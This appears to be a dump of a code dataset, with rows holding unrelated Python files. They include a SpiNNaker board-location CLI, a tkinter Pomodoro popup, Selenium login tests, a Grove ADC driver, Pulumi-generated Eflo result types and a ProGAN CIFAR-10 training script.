index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
23,500 | d0ac471b0235356ec39e3f3ba9f6a3f2dd8055e9 | # Copyright (c) 2016 The University of Manchester
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Command-line tool to find out where a particular chip or board resides.
The ``spalloc-where-is`` command allows you to query boards by coordinate, by
physical location, by chip or by job. In response to a query, a standard set of
information is displayed as shown in the example below::
$ spalloc-where-is --job-chip 24 14, 3
Machine: my-machine
Physical Location: Cabinet 2, Frame 4, Board 7
Board Coordinate: (3, 4, 0)
Machine Chip Coordinates: (38, 51)
Coordinates within board: (2, 3)
Job using board: 24
Coordinates within job: (14, 3)
In this example we ask, 'where is chip (14, 3) in job 24'? We discover that:
* The chip is in the machine named 'my-machine' on the board in cabinet 2, frame
4, board 7.
* This board's logical board coordinates are (3, 4, 0). These logical
coordinates may be used to specifically request this board from Spalloc in
the future.
* If 'my-machine' were booted as a single large machine, the chip we queried
would be chip (38, 51). This may be useful for cross-referencing with
diagrams produced by SpiNNer_.
* The chip in question is chip (2, 3) of its board. This may be useful when
reporting faulty chips/replacing boards.
* The job currently running on the board has ID 24. Obviously in this example
we already knew this but this may be useful when querying by board.
* Finally, we're told that the queried chip has the coordinates (14, 3) in the
machine allocated to job 24. Again, this information may be more useful when
querying by board.
.. _SpiNNer: https://github.com/SpiNNakerManchester/SpiNNer
To query by logical board coordinate::
spalloc-where-is --board MACHINE X Y Z
To query by physical board location::
spalloc-where-is --physical MACHINE CABINET FRAME BOARD
To query by chip coordinate (as if the machine were booted as one large
machine)::
spalloc-where-is --chip MACHINE X Y
To query by chip coordinate of chips allocated to a job::
spalloc-where-is --job-chip JOB_ID X Y
"""
import sys
import argparse
from spalloc_client import __version__
from spalloc_client.term import render_definitions
from .support import Terminate, Script
class WhereIsScript(Script):
    """Implements the ``spalloc-where-is`` command.

    Translates one of the four mutually-exclusive query styles (logical
    board, physical board, machine chip or job chip) into keyword
    arguments for the server's ``where_is`` call and pretty-prints the
    resulting location record.
    """

    def __init__(self):
        super().__init__()
        # All three are populated by get_parser()/verify_arguments()
        # before body() runs.
        self.parser = None
        self.where_is_kwargs = None
        self.show_board_chip = None

    def get_parser(self, cfg):  # @UnusedVariable
        """Build the command-line parser.

        Exactly one of the four query options must be supplied.
        """
        parser = argparse.ArgumentParser(
            description="Find out the location (physical or logical) "
                        "of a chip or board.")
        parser.add_argument(
            "--version", "-V", action="version", version=__version__)

        # The four query styles cannot be combined.
        query = parser.add_mutually_exclusive_group(required=True)
        query.add_argument(
            "--board", "-b", "--logical", "-l", nargs=4,
            metavar=("MACHINE", "X", "Y", "Z"),
            help="specify the logical board coordinate")
        query.add_argument(
            "--physical", "-p", nargs=4,
            metavar=("MACHINE", "CABINET", "FRAME", "BOARD"),
            help="specify a board's physical location")
        query.add_argument(
            "--chip", "-c", nargs=3, metavar=("MACHINE", "X", "Y"),
            help="specify a board by chip coordinates (as if the "
                 "whole machine is being used)")
        query.add_argument(
            "--job-chip", "-j", nargs=3, metavar=("JOB_ID", "X", "Y"),
            help="specify the chip coordinates of a chip within a "
                 "job's boards")
        self.parser = parser
        return parser

    def verify_arguments(self, args):
        """Convert the parsed arguments into ``where_is()`` kwargs.

        Sets ``self.where_is_kwargs`` and ``self.show_board_chip``;
        reports a parser error if any coordinate is not an integer.
        """
        try:
            if args.board:
                machine, x, y, z = args.board
                self.where_is_kwargs = {
                    "machine": machine,
                    "x": int(x), "y": int(y), "z": int(z),
                }
                self.show_board_chip = False
            elif args.physical:
                machine, cabinet, frame, board = args.physical
                self.where_is_kwargs = {
                    "machine": machine,
                    "cabinet": int(cabinet),
                    "frame": int(frame),
                    "board": int(board),
                }
                self.show_board_chip = False
            elif args.chip:
                machine, x, y = args.chip
                self.where_is_kwargs = {
                    "machine": machine,
                    "chip_x": int(x), "chip_y": int(y),
                }
                self.show_board_chip = True
            elif args.job_chip:
                job_id, x, y = args.job_chip
                self.where_is_kwargs = {
                    "job_id": int(job_id),
                    "chip_x": int(x), "chip_y": int(y),
                }
                self.show_board_chip = True
        except ValueError as e:
            self.parser.error("Error: {}".format(e))

    def body(self, client, args):  # @UnusedVariable
        """Query the server and print the location, if any.

        :raises Terminate: with exit code 4 when no board matches.
        """
        location = client.where_is(**self.where_is_kwargs)
        if location is None:
            raise Terminate(4, "No boards at the specified location")

        # Insertion order here is the display order.
        info = dict()
        info["Machine"] = location["machine"]
        info["Physical location"] = "Cabinet {}, Frame {}, Board {}".format(
            *location["physical"])
        info["Board coordinate"] = tuple(location["logical"])
        info["Machine chip coordinates"] = tuple(location["chip"])
        if self.show_board_chip:
            # Only meaningful for chip-level (not board-level) queries.
            info["Coordinates within board"] = tuple(location["board_chip"])
        info["Job using board"] = location["job_id"]
        if location["job_id"]:
            info["Coordinates within job"] = tuple(location["job_chip"])
        print(render_definitions(info))
# Module-level callable used as the ``spalloc-where-is`` console-script
# entry point (a Script instance is callable).
main = WhereIsScript()
if __name__ == "__main__":  # pragma: no cover
    sys.exit(main())
|
23,501 | e871514d810b837a8c00eeea5a8658110e4062a2 | #!/usr/bin/python3
from tkinter import *
from tkinter import messagebox
# Root window setup for the Pomodoro clock GUI.
main = Tk()
main.title('Pomodoro Clock')
main.geometry("300x200")
main.option_add('*Dialog.msg.width', 20)

# in the same window
#def startPomo():
#	global timeProvided
#	timeProvided = time.get()
	#print("Pomodoro Clock " + timeProvided)
#	lbl.config(text='Time provided: '+ timeProvided)
# in the same window
#submit = Button(main, text = "Submit", command = startPomo)
#submit.place(x = 100, y = 100)
#lbl = Label(main)
#lbl.pack()

# How long (ms) the error pop-up stays open before auto-closing.
ERROR_DURATION = 3000
def popupMessage():
    """Read the entry field and show the entered time in an info box.

    If the value is not an integer, a transient error window is shown
    instead and destroyed after ERROR_DURATION milliseconds.
    """
    global totalTime
    totalTime = time.get()
    try:
        totalTime = int(totalTime)
    except ValueError:
        # Not a number: totalTime is still the raw entry string here.
        error_window = Toplevel()
        error_window.title('Error')
        Message(error_window, text=totalTime + " is not any time.",
                padx=70, pady=70).pack()
        error_window.after(ERROR_DURATION, error_window.destroy)
    else:
        messagebox.showinfo("Pomodoro Clock", totalTime)
# Input widgets: a label, the time entry and the submit button.
timeLabel = Label(main, text = "Enter time")
timeLabel.pack()
# NOTE(review): "time" is a confusing name for an Entry widget (it reads
# like the stdlib time module); consider renaming it.
time = Entry(main)
time.pack()
# create a new popup
popup = Button(main, text = "Submit", command = popupMessage)
popup.place(x = 100,y = 100)
main.mainloop()
|
23,502 | 31760080dd4460841bd6d3d41b29a1b6bdd7b358 | from time import sleep
from selenium import webdriver
import unittest, time, re, random, sys
sys.path.append("./models")
sys.path.append("./page_obj")
from models import mytest,function
from page_obj.loginPage import login
from mytest import *
from selenium.webdriver.common.by import By
from xml.dom import minidom
from data.projectpath import ProjectPath
# Load per-browser enable flags and test accounts from data/info.xml.
dom = minidom.parse(ProjectPath + '\\data\\info.xml')
#dom = minidom.parse('C:\\Project\\TAGNAV_para\\data\\info.xml')
root = dom.documentElement
usernames = dom.getElementsByTagName('username')
Chs = dom.getElementsByTagName('Chrome')
Ies = dom.getElementsByTagName('IE')
Ffs = dom.getElementsByTagName('Firefox')
Eds = dom.getElementsByTagName('Edge')
# A 0 in the XML disables the whole suite for that browser.
Ch = int(Chs[0].firstChild.data)
Ie = int(Ies[0].firstChild.data)
Ff = int(Ffs[0].firstChild.data)
Ed = int(Eds[0].firstChild.data)


# BUG FIX: the original wrote "unittest.skipIf(Ch==0,'skip')" as a bare
# statement (missing the "@"), which builds a decorator and discards it,
# so the Chrome suite was never actually skipped. Applied as a decorator
# here, consistent with the IE/Firefox/Edge suites below.
@unittest.skipIf(Ch == 0, 'skip')
class loginTest_Chrome(Mytest):
    '''Test Login into NAV in chrome'''
    # Debug output emitted once, at class-creation time.
    print(Ch, Ie, Ff, Ed, usernames[0])

    def user_login_verify(self, username='', password=''):
        '''Submit the login form via the login page object.'''
        login(self.driver).user_login(username, password)

    def test_login1(self):
        '''login with username,password empty'''
        self.user_login_verify()
        po = login(self.driver)
        try:
            # Debug trace -- po.error_hint() is assumed to exist on the
            # page object; verify against loginPage. TODO confirm.
            print("cuowutishi", (po.error_hint()), 'woshitishijieshu')
            self.assertEqual(po.error_hint1(), 'User name is required.')
            self.assertEqual(po.error_hint2(), 'Password is required.')
        except AssertionError as e:
            # Soft assertion: record the failure and take a screenshot.
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_pawd_empty.png')

    def test_login2(self):
        '''login with username empty'''
        self.user_login_verify(password='123')
        po = login(self.driver)
        try:
            self.assertEqual(po.error_hint1(), 'User name is required.')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_empty.png')

    def test_login3(self):
        '''login with password empty'''
        self.user_login_verify(username='123')
        po = login(self.driver)
        try:
            self.assertEqual(po.error_hint1(), 'Password is required.')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'pawd_empty.png')

    def test_login4(self):
        '''login with wrong username password'''
        self.user_login_verify(password='123', username='123')
        po = login(self.driver)
        try:
            self.assertEqual(po.error_hint1(), 'The specified user name or password is not correct, or you do not have a valid user account in Dynamics 365 Business Central.')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_pawd_wrong.png')

    def test_login5(self):
        '''login with correct username password'''
        # NOTE(review): hard-coded test-environment credentials.
        self.user_login_verify(username='adnm', password='@dnm2012')
        po = login(self.driver)
        try:
            self.assertEqual(po.login_success(), 'Dynamics 365 Business Central')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_pawd_correct.png')
        login(self.driver).confirm_caution()
@unittest.skipIf(Ie==0,'skip')
class loginTest_IE(TFS_5555_ie):
    '''Test Login into NAV in ie'''

    def user_login_verify(self, username='', password=''):
        '''function note'''
        # Submit the login form via the login page object.
        login(self.driver).user_login(username, password)

    def test_login1(self):
        '''login with username,password empty'''
        self.user_login_verify()
        po = login(self.driver)
        try:
            self.assertEqual(po.error_hint1(), 'User name is required.')
            self.assertEqual(po.error_hint2(), 'Password is required.')
        except AssertionError as e:
            # Soft assertion: record the failure and take a screenshot.
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_pawd_empty.png')

    def test_login2(self):
        '''login with username empty'''
        self.user_login_verify(password='123')
        po = login(self.driver)
        try:
            self.assertEqual(po.error_hint1(), 'User name is required.')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_empty.png')

    def test_login3(self):
        '''login with password empty'''
        self.user_login_verify(username='123')
        po = login(self.driver)
        try:
            self.assertEqual(po.error_hint1(), 'Password is required.')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'pawd_empty.png')

    def test_login4(self):
        '''login with wrong username password'''
        self.user_login_verify(password='123', username='123')
        po = login(self.driver)
        sleep(3)  # allow the server round-trip before reading the hint
        try:
            self.assertEqual(po.error_hint1(), 'The specified user name or password is not correct, or you do not have a valid user account in Dynamics 365 Business Central.')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_pawd_wrong.png')

    def test_login5(self):
        '''login with correct username password'''
        # NOTE(review): hard-coded test-environment credentials.
        self.user_login_verify(username='adnm', password='@dnm2012')
        po = login(self.driver)
        sleep(3)
        try:
            self.assertEqual(po.login_success(), 'Dynamics 365 Business Central')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_pawd_correct.png')
        login(self.driver).confirm_caution()
@unittest.skipIf (Ff==0,'skip')
class loginTest_FF(L_5557_firefox):
    '''Test Login into NAV in firefox'''

    def user_login_verify(self, username='', password=''):
        '''function note'''
        # Submit the login form via the login page object.
        login(self.driver).user_login(username, password)

    def test_login1(self):
        '''login with username,password empty'''
        self.user_login_verify()
        po = login(self.driver)
        try:
            self.assertEqual(po.error_hint1(), 'User name is required.')
            self.assertEqual(po.error_hint2(), 'Password is required.')
        except AssertionError as e:
            # Soft assertion: record the failure and take a screenshot.
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_pawd_empty.png')

    def test_login2(self):
        '''login with username empty'''
        self.user_login_verify(password='123')
        po = login(self.driver)
        try:
            self.assertEqual(po.error_hint1(), 'User name is required.')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_empty.png')

    def test_login3(self):
        '''login with password empty'''
        self.user_login_verify(username='123')
        po = login(self.driver)
        try:
            self.assertEqual(po.error_hint1(), 'Password is required.')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'pawd_empty.png')

    def test_login4(self):
        '''login with wrong username password'''
        self.user_login_verify(password='123', username='123')
        po = login(self.driver)
        # 30 s wait -- presumably Firefox is slow in this environment;
        # confirm whether an explicit WebDriverWait could replace it.
        sleep(30)
        try:
            self.assertEqual(po.error_hint1(), 'The specified user name or password is not correct, or you do not have a valid user account in Dynamics 365 Business Central.')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_pawd_wrong.png')

    def test_login5(self):
        '''login with correct username password'''
        # NOTE(review): hard-coded test-environment credentials.
        self.user_login_verify(username='adnm', password='@dnm2012')
        po = login(self.driver)
        sleep(30)
        try:
            self.assertEqual(po.login_success(), 'Dynamics 365 Business Central')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        login(self.driver).confirm_caution()
        function.insert_img(self.driver, 'user_pawd_correct.png')
@unittest.skipIf (Ed==0,'skip')
class loginTest_Edge(L_5558_edge):
    '''Test Login into NAV in edge'''

    def user_login_verify(self, username='', password=''):
        '''function note'''
        # Submit the login form via the login page object.
        login(self.driver).user_login(username, password)

    def test_login1(self):
        '''login with username,password empty'''
        self.user_login_verify()
        po = login(self.driver)
        try:
            self.assertEqual(po.error_hint1(), 'User name is required.')
            self.assertEqual(po.error_hint2(), 'Password is required.')
        except AssertionError as e:
            # Soft assertion: record the failure and take a screenshot.
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_pawd_empty.png')

    def test_login2(self):
        '''login with username empty'''
        self.user_login_verify(password='123')
        po = login(self.driver)
        try:
            self.assertEqual(po.error_hint1(), 'User name is required.')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_empty.png')

    def test_login3(self):
        '''login with password empty'''
        self.user_login_verify(username='123')
        po = login(self.driver)
        try:
            self.assertEqual(po.error_hint1(), 'Password is required.')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'pawd_empty.png')

    def test_login4(self):
        '''login with wrong username password'''
        self.user_login_verify(password='123', username='123')
        po = login(self.driver)
        sleep(5)  # allow the server round-trip before reading the hint
        try:
            self.assertEqual(po.error_hint1(), 'The specified user name or password is not correct, or you do not have a valid user account in Dynamics 365 Business Central.')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        function.insert_img(self.driver, 'user_pawd_wrong.png')

    def test_login5(self):
        '''login with correct username password'''
        # NOTE(review): hard-coded test-environment credentials.
        self.user_login_verify(username='adnm', password='@dnm2012')
        po = login(self.driver)
        sleep(5)
        try:
            self.assertEqual(po.login_success(), 'Dynamics 365 Business Central')
        except AssertionError as e:
            self.verificationErrors.append(str(e))
        login(self.driver).confirm_caution()
        function.insert_img(self.driver, 'user_pawd_correct.png')
# Allow running this suite directly from the command line.
if __name__ == "__main__":
    unittest.main()
|
23,503 | 698fe37cf7b1febd9c2547065fd9166a8f8d7ec3 | import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['toolbar'] = 'None'  # hide the matplotlib toolbar
fig = plt.figure(figsize=(10, 10))
res = 1000  # number of Euler integration steps
# NOTE(review): "len" shadows the builtin len(); it is the total time span
# used by main() -- renaming it would require touching main() as well.
len = 10
x0, y0 = 1, 1  # initial condition of the trajectory
def dx(r, dt):
    # x-increment for one Euler step given state r = [x, y].
    # NOTE(review): the empty tuple "()" is an unfilled placeholder -- as
    # written, ()*dt raises TypeError for a float dt. TODO: insert the
    # actual x-derivative expression in r[0]/r[1].
    return ()*dt
def dy(r, dt):
    # y-increment for one Euler step given state r = [x, y].
    # NOTE(review): placeholder like dx() above; ()*dt raises TypeError
    # for a float dt. TODO: insert the actual y-derivative expression.
    return ()*dt
def main():
    """Integrate the system with explicit Euler steps and plot the path."""
    arr_x = np.empty(res)
    arr_y = np.empty(res)
    dt = len/res  # step size; "len" is the module-level time span above
    arr_x[0] = x0
    arr_y[0] = y0
    for i in range(1, res):
        # Euler step: previous state plus the dx/dy increments
        # (currently broken until dx()/dy() are filled in).
        arr_x[i] = arr_x[i-1] + dx([arr_x[i-1], arr_y[i-1]], dt)
        arr_y[i] = arr_y[i-1] + dy([arr_x[i-1], arr_y[i-1]], dt)
    print("done")
    plt.plot(arr_x, arr_y)
    plt.show()


if __name__ == "__main__":
    main()
|
# Demonstrate str.isnumeric(): both a decimal string (the '.' is not a
# numeric character) and alphabetic text report False.
for string in ('555.2', "thaathaa"):
    print(string.isnumeric())
|
23,505 | 5f9b4b486a312eb28ba5e5432cd00e76cb615b1e | class View:
def __init__(self, axis1, axis2=None, bins=100, same_scale=False,
axis1_values=None, axis2_values=None, **kwargs):
"""
Plot view on one or two axis to be generated from event data
The possible specifiers are defined in McStasEvenData and are
x : x position [m]
y : x position [m]
z : x position [m]
vx : x velocity [m/s]
vy : x velocity [m/s]
vz : x velocity [m/s]
speed : [m/s]
dx : divergence x [deg]
dy : divergence y [deg]
t : time [s]
l : wavelength [AA]
e : energy [meV]
Parameters:
axis1 : str
Specifier for first axis to be shown
axis2 : str (optional)
Specifier for second axis to be shown
bins : int or [int, int]
Number of bins for generation of histogram
axis1_values : float or list of floats
Values that will be plotted as lines on plot
axis2_values : float or list of floats
Values that will be plotted as lines on plot
same_scale : bool
Controls whether all displays of this view is on same ranges
"""
self.same_scale = same_scale
self.axis1 = axis1
self.axis1_limits = None
if isinstance(axis1_values, (float, int)):
axis1_values = [axis1_values]
self.axis1_values = axis1_values
self.axis2 = axis2
self.axis2_limits = None
if isinstance(axis2_values, (float, int)):
axis2_values = [axis2_values]
self.axis2_values = axis2_values
self.bins = bins
self.plot_options = kwargs
def __repr__(self):
string = f"View ({self.axis1}"
if self.axis2 is not None:
string += f", {self.axis2}"
string += ")"
string = string.ljust(25)
string += f" bins: {str(self.bins)}"
return string
def set_axis1_limits(self, start, end):
"""
Sets the axis1 limits
"""
if start > end:
raise ValueError("Start point over end for this view.")
self.axis1_limits = start, end
def set_axis2_limits(self, start, end):
"""
Sets the axis2 limits
"""
if start > end:
raise ValueError("Start point over end for this view.")
self.axis2_limits = start, end
def clear_limits(self):
"""
Clears all limits
"""
self.axis1_limits = None
self.axis2_limits = None |
23,506 | 0d57c54bd34e1ba574c372da70d8451b92087999 | '''
## License
The MIT License (MIT)
Grove 8 channels 12 bit ADC Hat for the Raspberry Pi, used to connect grove sensors.
Copyright (C) 2018 Seeed Technology Co.,Ltd.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import time
from grove.i2c import Bus
# I2C register map of the Grove 8-channel 12-bit ADC hat.
ADC_DEFAULT_IIC_ADDR = 0x04
ADC_CHAN_NUM = 8

REG_RAW_DATA_START = 0x10
REG_VOL_START = 0x20
REG_RTO_START = 0x30
REG_SET_ADDR = 0xC0


class Pi_hat_adc():
    """Driver for the Grove 8-channel 12-bit ADC hat on the I2C bus."""

    def __init__(self, bus_num=1, addr=ADC_DEFAULT_IIC_ADDR):
        self.bus = Bus(bus_num)
        self.addr = addr

    def _read_word(self, base_reg, channel):
        """Read one little-endian 16-bit value for *channel* at *base_reg*."""
        raw = self.bus.read_i2c_block_data(self.addr, base_reg + channel, 2)
        return (raw[1] << 8) | raw[0]

    def get_all_adc_raw_data(self):
        """Raw 12-bit counts for all channels (max value 4095)."""
        return [self._read_word(REG_RAW_DATA_START, ch)
                for ch in range(ADC_CHAN_NUM)]

    def get_nchan_adc_raw_data(self, n):
        """Raw 12-bit count for channel *n*."""
        return self._read_word(REG_RAW_DATA_START, n)

    def get_all_vol_milli_data(self):
        """Voltage in millivolts for all channels (max 3300 mV)."""
        return [self._read_word(REG_VOL_START, ch)
                for ch in range(ADC_CHAN_NUM)]

    def get_nchan_vol_milli_data(self, n):
        """Voltage in millivolts for channel *n*."""
        return self._read_word(REG_VOL_START, n)

    def get_all_ratio_0_1_data(self):
        """Ratio in units of 0.1 %% for all channels."""
        return [self._read_word(REG_RTO_START, ch)
                for ch in range(ADC_CHAN_NUM)]

    def get_nchan_ratio_0_1_data(self, n):
        """Ratio in units of 0.1 %% for channel *n*."""
        return self._read_word(REG_RTO_START, n)
# Module-level singleton; constructing it opens the I2C bus immediately.
ADC = Pi_hat_adc()


def main():
    """Read and print raw counts, millivolts and ratios for all 8 channels."""
    raw_data = ADC.get_all_adc_raw_data()
    vol_data = ADC.get_all_vol_milli_data()
    ratio_data = ADC.get_all_ratio_0_1_data()
    print("raw data for each channel:(1-8chan)(12 bit-max=4096):")
    print(raw_data)
    print("voltage for each channel:(unit:mv,max=3300mv):")
    print(vol_data)
    print ("ratio for each channel(unit 0.1%,max=100.0%):")
    print(ratio_data)
    print(" ")
    print("NOTICE!!!:")
    print("The default setting of ADC PIN is floating_input.")
    print(" ")


if __name__ == '__main__':
    main()
|
23,507 | b99d8aafee4fe75e584a77d0a1f506f2f28464d6 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetSubnetsSubnetResult',
'GetVpdsVpdResult',
]
# NOTE: auto-generated by the Pulumi Terraform Bridge (tfgen) -- regenerate
# rather than hand-editing. Read-only output type describing one Eflo
# subnet as returned by the getSubnets data source.
@pulumi.output_type
class GetSubnetsSubnetResult(dict):
    def __init__(__self__, *,
                 cidr: str,
                 create_time: str,
                 gmt_modified: str,
                 id: str,
                 message: str,
                 resource_group_id: str,
                 status: str,
                 subnet_id: str,
                 subnet_name: str,
                 type: str,
                 vpd_id: str,
                 zone_id: str):
        """
        :param str cidr: Network segment
        :param str create_time: The creation time of the resource
        :param str gmt_modified: Modification time
        :param str id: The ID of the resource.
        :param str message: Error message
        :param str resource_group_id: Resource Group ID.
        :param str status: The status of the resource.
        :param str subnet_id: Primary key ID.
        :param str subnet_name: The Subnet name.
        :param str type: Eflo subnet usage type, optional value:
               - General type is not filled in
               - OOB:OOB type
               - LB: LB type
        :param str vpd_id: The Eflo VPD ID.
        :param str zone_id: The zone ID of the resource.
        """
        pulumi.set(__self__, "cidr", cidr)
        pulumi.set(__self__, "create_time", create_time)
        pulumi.set(__self__, "gmt_modified", gmt_modified)
        pulumi.set(__self__, "id", id)
        pulumi.set(__self__, "message", message)
        pulumi.set(__self__, "resource_group_id", resource_group_id)
        pulumi.set(__self__, "status", status)
        pulumi.set(__self__, "subnet_id", subnet_id)
        pulumi.set(__self__, "subnet_name", subnet_name)
        pulumi.set(__self__, "type", type)
        pulumi.set(__self__, "vpd_id", vpd_id)
        pulumi.set(__self__, "zone_id", zone_id)

    @property
    @pulumi.getter
    def cidr(self) -> str:
        """
        Network segment
        """
        return pulumi.get(self, "cidr")

    @property
    @pulumi.getter(name="createTime")
    def create_time(self) -> str:
        """
        The creation time of the resource
        """
        return pulumi.get(self, "create_time")

    @property
    @pulumi.getter(name="gmtModified")
    def gmt_modified(self) -> str:
        """
        Modification time
        """
        return pulumi.get(self, "gmt_modified")

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        The ID of the resource.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def message(self) -> str:
        """
        Error message
        """
        return pulumi.get(self, "message")

    @property
    @pulumi.getter(name="resourceGroupId")
    def resource_group_id(self) -> str:
        """
        Resource Group ID.
        """
        return pulumi.get(self, "resource_group_id")

    @property
    @pulumi.getter
    def status(self) -> str:
        """
        The status of the resource.
        """
        return pulumi.get(self, "status")

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> str:
        """
        Primary key ID.
        """
        return pulumi.get(self, "subnet_id")

    @property
    @pulumi.getter(name="subnetName")
    def subnet_name(self) -> str:
        """
        The Subnet name.
        """
        return pulumi.get(self, "subnet_name")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        Eflo subnet usage type, optional value:
        - General type is not filled in
        - OOB:OOB type
        - LB: LB type
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter(name="vpdId")
    def vpd_id(self) -> str:
        """
        The Eflo VPD ID.
        """
        return pulumi.get(self, "vpd_id")

    @property
    @pulumi.getter(name="zoneId")
    def zone_id(self) -> str:
        """
        The zone ID of the resource.
        """
        return pulumi.get(self, "zone_id")
# NOTE: auto-generated by the Pulumi Terraform Bridge (tfgen) -- regenerate
# rather than hand-editing. Read-only output type describing one Eflo VPD
# as returned by the getVpds data source.
@pulumi.output_type
class GetVpdsVpdResult(dict):
    def __init__(__self__, *,
                 cidr: str,
                 create_time: str,
                 gmt_modified: str,
                 id: str,
                 resource_group_id: str,
                 status: str,
                 vpd_id: str,
                 vpd_name: str):
        """
        :param str cidr: CIDR network segment
        :param str create_time: The creation time of the resource
        :param str gmt_modified: Modification time
        :param str id: The id of the vpd.
        :param str resource_group_id: The Resource group id
        :param str status: The Vpd status. Valid values: `Available`, `Not Available`, `Executing`, `Deleting`,
        :param str vpd_id: The id of the vpd.
        :param str vpd_name: The Name of the VPD.
        """
        pulumi.set(__self__, "cidr", cidr)
        pulumi.set(__self__, "create_time", create_time)
        pulumi.set(__self__, "gmt_modified", gmt_modified)
        pulumi.set(__self__, "id", id)
        pulumi.set(__self__, "resource_group_id", resource_group_id)
        pulumi.set(__self__, "status", status)
        pulumi.set(__self__, "vpd_id", vpd_id)
        pulumi.set(__self__, "vpd_name", vpd_name)

    @property
    @pulumi.getter
    def cidr(self) -> str:
        """
        CIDR network segment
        """
        return pulumi.get(self, "cidr")

    @property
    @pulumi.getter(name="createTime")
    def create_time(self) -> str:
        """
        The creation time of the resource
        """
        return pulumi.get(self, "create_time")

    @property
    @pulumi.getter(name="gmtModified")
    def gmt_modified(self) -> str:
        """
        Modification time
        """
        return pulumi.get(self, "gmt_modified")

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        The id of the vpd.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter(name="resourceGroupId")
    def resource_group_id(self) -> str:
        """
        The Resource group id
        """
        return pulumi.get(self, "resource_group_id")

    @property
    @pulumi.getter
    def status(self) -> str:
        """
        The Vpd status. Valid values: `Available`, `Not Available`, `Executing`, `Deleting`,
        """
        return pulumi.get(self, "status")

    @property
    @pulumi.getter(name="vpdId")
    def vpd_id(self) -> str:
        """
        The id of the vpd.
        """
        return pulumi.get(self, "vpd_id")

    @property
    @pulumi.getter(name="vpdName")
    def vpd_name(self) -> str:
        """
        The Name of the VPD.
        """
        return pulumi.get(self, "vpd_name")
|
23,508 | 4df63a5bff09ac2ccc131af7712ec85367f33e2c | import torch as th
from torchvision.datasets import CIFAR10
from torchvision.transforms import Compose, Normalize, ToTensor
from pro_gan_pytorch.PRO_GAN import ConditionalProGAN
# create the dataset:
dataset = CIFAR10("../data/cifar-10/cifar-10_with_labels",
                  transform=Compose((
                      ToTensor(),
                      # map [0, 1] image tensors to [-1, 1]
                      Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
                  )))

# create the conditional pro-gan
cond_pro_gan = ConditionalProGAN(
    num_classes=10,          # CIFAR-10 label count
    depth=4,                 # four progressive-growing stages
    device=th.device("cuda")
)

# train the model; the per-stage lists below are indexed by depth
cond_pro_gan.train(
    dataset=dataset,
    epochs=[20, 20, 20, 20],
    batch_sizes=[128, 128, 128, 128],
    fade_in_percentage=[50, 50, 50, 50],
    feedback_factor=5,
    sample_dir="training_runs/cifar-10/samples",
    save_dir="training_runs/cifar-10/models",
    # NOTE(review): log_dir points at the models directory rather than a
    # separate logs directory -- confirm this is intentional.
    log_dir="training_runs/cifar-10/models"
)
|
23,509 | 25d55643e841d6a95af0649c0347c9dc10a1dd7f | #Python05_9_CollectionList06_신동혁
# list growth: concatenation adds one element; adding a bracketed list
# nests it as a single element.
a = [1, 2, 3]
